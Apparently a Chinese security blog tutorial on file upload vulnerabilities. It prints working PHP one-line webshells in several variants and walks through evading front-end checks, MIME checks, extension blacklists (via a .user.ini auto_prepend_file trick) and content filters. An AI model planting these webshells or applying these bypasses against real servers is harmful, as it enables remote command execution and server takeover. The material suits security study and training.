当前位置：首页 > news >正文

文件上传漏洞--理论

news 2025/10/29 1:58:17

什么是文件上传漏洞？

Web应用允许用户上传文件，但是没有对上传的文件进行严格的过滤和检测，导致网站执行了文件中包含的恶意代码。

漏洞的基本利用方式是：
成功上传包含恶意代码的文件，并在服务端成功执行该文件。

可见实现该漏洞的两个要点在于上传与执行。

一句话木马

指仅由一行代码构成的木马文件。通过在服务端植入这行代码，就能获取到执行服务端命令的权限。
下面是最基本的一句话木马：

//shell.php
<?php @eval($_POST[1]);?>
@指即使后面发生错误也不报错。
eval()函数将函数中的内容当作php代码执行。
$_POST[1]表示通过POST向网页传递名为1的参数。

当我们成功上传木马程序后，只要能找到它在目标服务器的对应位置，就能打开该程序并执行系统命令。

一句话木马的其他形式：

<?=@eval($_POST['cmd']);?>     //短标签，适合过滤php时使用
<% @eval($_POST['cmd']);%>     //asp风格
<script language='php'>@eval($_POST['cmd']);</script>   //<script>风格，适合过滤<?时使用

常见的文件上传漏洞

前端校验

有些网站将对上传文件的检测及过滤功能写在了前端，导致攻击者能够轻松绕过检测。

例如下面这个界面，就是将检测功能写在了前端。
在这里插入图片描述我们注意到该页面只允许上传后缀为png的文件。对于这种情况，我们常用的绕过方法有两种。

第一种： 修改前端代码。
F12–查看器，将相应的位置修改为php，就可以上传php后缀的文件。
在这里插入图片描述
第二种： 将我们的.php文件修改为.png文件，然后上传并抓包，在请求体中将后缀名修改回.php，同样绕过了前端检测。

MIME验证

对文件的媒体类型进行检测，媒体类型信息在请求头中位于文件的Content-Type位置，如果不符合上传要求，就会被拦截。

对于这种检测，我们的绕过方式是将Content-Type修改为允许上传的类型。
在这里插入图片描述常见的图片格式媒体类型：

image/jpeg：JPEG格式图片；
image/gif：GIF格式图片；
image/png：PNG格式图片；

后端过滤后缀名（.user.ini）

在服务端的后端定义了一个后缀名黑名单，并会检测用户上传文件的后缀名是否位于该黑名单中。如果在，则拒绝上传。

对于这种过滤，我们只能将木马程序的后缀名修改为合法的后缀名才能成功上传。
但是这种情况下，服务端就不会将我们的木马程序解析为PHP程序，也就不能正常执行我们的木马。

为了让服务器能够以正常执行我们的程序，可以上传 .user.ini 文件。

//.user.ini
auto_prepend_file=shell.png

这个文件的作用是：在访问主页文件时，会自动包含shell.png文件，将其文件内容当做php代码执行。
如果我们上传的文件在/upload目录下，那么upload就是shell.png的主页文件。我们访问/upload时，会自动包含并以php代码形式执行shell.png中的恶意代码。

文件内容过滤

即服务器后端对文件的内容进行了检测，如果其中包含不合规的内容，就会拒绝文件上传。

常见过滤及绕过：

过滤php 使用短标签 <?= 绕过
过滤[] 使用{}绕过
过滤[]和{} 不能使用一句话木马，直接上传RCE代码
过滤() 使用反引号执行RCE
过滤()和反引号 不能正常上传恶意代码，考虑使用日志注入

文件上传漏洞--理论

什么是文件上传漏洞？

一句话木马

常见的文件上传漏洞

前端校验

MIME验证

后端过滤后缀名（.user.ini）

文件内容过滤

相关文章：

文件上传漏洞--理论

快速入门Selenium自动化测试

C++指针使用指南

一文学会，利用LLaMA 3.2打造能“识图断字”的个人AI助理

idea的mapper.xml文件里写sql语句出现Tag name expected错误提示

EasyExcel 使用多线程按顺序导出数据

数据驱动的投资分析：民锋科技的量化模型探索

cesium 设置相机视角 flyTo 参数destination，orientation

vue+Leaflet.PM插件实现创建和编辑几何图形(点、线、面、圆等)

Rust语言在系统编程中的应用

test 是 JavaScript 中正则表达式对象 (RegExp) 的一种方法，用于测试一个字符串是否匹配某个正则表达式

大厂社招3年-力扣热点高频刷题记录（已更新100+道热点题）

6.2 对角化矩阵（2）

ubuntu24.04播放语音视频

GPT4的下一代Orion已经降速了?

SpringCloud框架学习（第二部分：Consul、LoadBalancer和openFeign）

Linux 批量配置互信

设计定长的内存池

【动手学电机驱动】 STM32-FOC（7）基于 MCSDK6.0 控制与调试速度环

无人机飞手考证，地面站培训技术详解

Python爬虫实战：研究MechanicalSoup库相关技术

手游刚开服就被攻击怎么办？如何防御DDoS？

Redis相关知识总结（缓存雪崩，缓存穿透，缓存击穿，Redis实现分布式锁，如何保持数据库和缓存一致）

安宝特方案丨XRSOP人员作业标准化管理平台：AR智慧点检验收套件

STM32标准库-DMA直接存储器存取

《用户共鸣指数（E）驱动品牌大模型种草：如何抢占大模型搜索结果情感高地》

el-switch文字内置

【C语言练习】080. 使用C语言实现简单的数据库操作

在鸿蒙HarmonyOS 5中使用DevEco Studio实现录音机应用

Map相关知识